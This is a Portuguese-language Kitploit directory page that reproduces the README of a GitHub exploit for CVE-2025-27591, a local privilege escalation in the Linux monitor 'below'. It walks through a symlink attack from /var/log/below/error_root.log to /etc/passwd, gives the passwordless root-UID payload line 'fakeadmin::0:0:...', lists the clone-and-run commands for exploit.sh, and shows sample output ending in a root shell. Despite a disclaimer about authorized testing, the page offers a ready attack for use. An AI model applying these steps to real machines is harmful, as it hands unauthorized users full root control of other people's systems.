Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-27591 — 🔥 Exploração de Escalação de Privilégio Local para CVE-2025-27591 | Abusa do diretório de logs gravável globalmente no Below para obter root via injeção em /etc/passwd | Kitploit
Ferramentas/GitHubGitHub/00xcanelo/cve-2025-27591
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoExploração de Binários
GitHub00xcanelo/cve-2025-27591

CVE-2025-27591

🔥 Exploração de Escalação de Privilégio Local para CVE-2025-27591 | Abusa do diretório de logs gravável globalmente no Below para obter root via injeção em /etc/passwd

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-27591 – Escalação de Privilégios via Abuso de Symlink no below

Author CVE

🛑 Aviso: Este exploit é fornecido apenas para fins educacionais e testes de segurança autorizados. O uso não autorizado pode ser ilegal.


🧠 Visão Geral

below é uma ferramenta de monitoramento de desempenho desenvolvida pelo Facebook para sistemas Linux. Versões do below anteriores a uma versão corrigida são afetadas por uma vulnerabilidade crítica que permite que usuários não privilegiados escalem para root explorando diretórios de log graváveis por qualquer usuário e manipulação não sanitizada de logs.


🔎 Detalhes do CVE


💥 Lógica do Exploit

Este script Bash realiza o seguinte:

  1. Verificação de Diretório Gravável por Qualquer Usuário:

    • Confirma se /var/log/below é gravável por qualquer usuário (um sinal vermelho).
  2. Preparação do Ataque de Symlink:

    • Exclui o error_root.log existente (se houver) e cria um link simbólico para /etc/passwd.
  3. Construção do Payload:

    • Acrescenta um usuário root falso ao /etc/passwd:
      root@kitploit:~
      fakeadmin::0:0:fakeadmin:/root:/bin/bash
      
  4. Disparo do Log:

    • Executa sudo below record para forçar o binário vulnerável a escrever logs.
  5. Obtenção de Acesso Root:

    • Usa su fakeadmin para obter um shell root sem solicitação de senha.

📁 Estrutura de Diretórios

root@kitploit:~
CVE-2025-27591/
├── exploit.sh
├── README.md

✅ Pré-requisitos

Antes de executar o exploit, certifique-se de ter o seguinte:

  • Shell Bash (sistema Linux)
  • O binário vulnerável instalado: /usr/bin/below
  • Diretório de log gravável por qualquer usuário: /var/log/below
  • Privilégios sudo para executar: sudo below record
  • Ferramentas disponíveis:
    • ln (para criar symlinks)
    • su (para trocar de usuário)
    • timeout (para controlar o tempo de execução)
    • whoami (para verificar privilégios)

🚀 Passos de Exploração

root@kitploit:~
# 1. Clone o repositório
git clone https://github.com/00xCanelo/CVE-2025-27591.git
cd CVE-2025-27591

# 2. Torne o script executável
chmod +x exploit.sh

# 3. Execute o exploit
./exploit.sh

🧪 Exemplo de Saída

root@kitploit:~
[*] Checking for CVE-2025-27591 vulnerability...
[+] /var/log/below is world-writable.
[!] Found existing log file: removing it...
[+] Created symlink: /var/log/below/error_root.log -> /etc/passwd

[*] Writing malicious line to /tmp/fakeadmin
[*] Triggering logging via 'sudo below record'...
[+] 'below record' executed (or timed out)

[*] Attempting to write payload to /etc/passwd via symlink...
[+] Payload successfully appended.

[*] Trying to switch to root shell using 'su fakeadmin'...
root@target:/# whoami
root
Baixar ferramenta
CampoValor
CVE-IDCVE-2025-27591
Severidade🔥 Crítico (CVSS ≈ 7.8 - 8.8)
Vetor de AtaqueLocal
ImpactoEscalação de Privilégio para root (UID=0)
Tipo de ExploitAbuso de Symlink / Injeção em Arquivo de Log
Aplicação Afetadabelow – normalmente instalado como /usr/bin/below
Causa RaizEscritas inseguras em arquivos em /var/log/below/ sem verificações de permissão